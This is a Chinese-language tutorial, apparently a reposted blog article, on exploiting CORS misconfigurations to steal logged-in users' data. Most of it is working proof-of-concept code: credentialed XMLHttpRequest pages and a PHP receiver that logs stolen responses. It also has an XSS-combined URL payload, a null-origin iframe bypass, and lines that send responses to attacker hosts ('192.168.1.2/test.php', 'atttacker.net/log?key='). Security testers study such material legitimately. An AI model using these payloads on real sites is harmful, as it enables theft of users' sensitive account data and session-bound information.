CORS漏洞的利用方式(精)
1.同于csrf跨站請(qǐng)求偽造,發(fā)送釣魚鏈接,讀取用戶敏感數(shù)據(jù)。
poc:
<html> <body> <center> <h2>CORS POC Exploit</h2> <h3>Extract SID</h3><div id="demo"> <button type="button" onclick="cors()">Exploit</button> </div><script> function cors() {var xhttp = new XMLHttpRequest();xhttp.onreadystatechange = function() {if (this.readyState == 4 && this.status == 200) {document.getElementById("demo").innerHTML = alert(this.responseText);}};xhttp.open("GET", "https://target.com/info/", true);xhttp.withCredentials = true;xhttp.send(); } </script> </body> </html>用戶點(diǎn)擊button彈出響應(yīng)信息
document.getElementById("demo").innerHTML = alert(this.responseText);上面代碼只是彈出響應(yīng)信息,你還可以獲取cookie,針對(duì)http-only js代碼無法讀取的情況:
<!DOCTYPE> <html> <h1>cors exploit</h1> <script type="text/javascript"> function exploit() {var xhr1;var xhr2;if(window.XMLHttpRequest){xhr1 = new XMLHttpRequest();xhr2 = new XMLHttpRequest();}else{xhr1 = new ActiveXObject("Microsoft.XMLHTTP");xhr2= new ActiveXObject("Microsoft.XMLHTTP");}xhr1.onreadystatechange=function(){if(xhr1.readyState == 4 && xhr1.status == 200) {var datas=xhr1.responseText;xhr2.open("POST","http://192.168.1.2/test.php","true");xhr2.setRequestHeader("Content-type","application/x-www-form-urlencoded");xhr2.send("z0="+escape(datas)); }}xhr1.open("GET","http:/192.168.1.1/index.php","true") xhr1.withCredentials = true; xhr1.send(); } exploit(); </script> </html>搭建的攻擊服務(wù)器惡意代碼 tes.php:
<?php $file = fopen("secrect.html", "w+"); $res = $_POST['z0']; fwrite($file, $res); fclose($res); ?>2.結(jié)合xss漏洞利用cors漏洞,針對(duì)http_only js代碼無法讀取
poc:
function exploit() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.status == 200) { alert(this.responseText); document.getElementById("demo").innerHTML = this.responseText; } }; xhttp.open("GET", "http://192.168.1.1/index.php", true); xhttp.withCredentials = true; xhttp.send(); } exploit();利用:
http://192.168.1.1/index.php?<script>function%20cors(){var%20xhttp=new%20XMLHttpRequest();xhttp.onreadystatechange=function(){if(this.status==200) alert(this.responseText);document.getElementById("demo").innerHTML=this.responseText}};xhttp.open("GET","http:///192.168.1.1",true);xhttp.withCredentials=true;xhttp.send()}cors();</script>&form_cartes=73&iframestat=1同理結(jié)合上面代碼,發(fā)送到你的服務(wù)器
3.基于白名單防護(hù)的繞過
Origin: null同上,判斷是否支持null
如果支持可以使用iframe跨域請(qǐng)求,繞過
poc:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','vuln.com',true); req.withCredentials = true; req.send();function reqListener() { location='your.com/l?get='+this.responseText; }; </script>'></iframe>4. 某實(shí)例
1)SEMrush CORS misconfig
訪問semrush的一個(gè)api端點(diǎn),插入Origin頭為攻擊者服務(wù)器:
返回信息主體是用戶敏感信息,需注意的是返回的Access-Control-Allow-Origin是攻擊者服務(wù)器,這意味著系統(tǒng)存在CORS配置錯(cuò)誤。
下一步,構(gòu)造HTML文件,誘使受害者點(diǎn)擊:
點(diǎn)擊后,界面將彈出受害者敏感信息:
修改一下reqListener()函數(shù)為
location='//atttacker.net/log?key='+this.responseText;將把敏感數(shù)據(jù)發(fā)到攻擊者服務(wù)器。
2)redacted子域XSS+ CORSmisconfig
和上面的案例類似,只是Origin接受的是redacted和子域:Origin:evil.redacted.com,要利用這個(gè)漏洞,必須在子域中尋找一個(gè)xss漏洞,結(jié)合xss發(fā)起請(qǐng)求,最終在banques.redacted.com發(fā)現(xiàn)xss:
https://banques.redacted.com/choice-quiz?form_banque=“> <script> alert(document.domain)</script>&form_cartes= 73&iframestat= 1,將alert事件替換為CORS請(qǐng)求:
最終poc為:
成功獲取到敏感數(shù)據(jù):
3)繞過手段
繞過通常使用如下poc:
http://www.target.local{.<your-domain>/cors-poc
總結(jié)
以上是生活随笔為你收集整理的CORS漏洞的利用方式(精)的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: shell获取命令行结果指定列(指定列结
- 下一篇: 树莓派管脚图